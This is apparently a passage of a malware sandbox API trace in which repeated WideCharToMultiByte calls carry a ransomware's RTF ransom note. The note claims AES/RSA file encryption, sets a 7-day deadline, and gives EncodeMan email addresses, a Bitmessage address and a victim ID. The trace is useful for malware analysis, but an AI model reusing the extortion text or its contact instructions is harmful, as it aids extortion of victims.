nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.160] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.160] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x23731c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nGé(²S#JÊé¶\x8a\x16Cµ\x81¬O]S\x0cð\x92/£\x01", 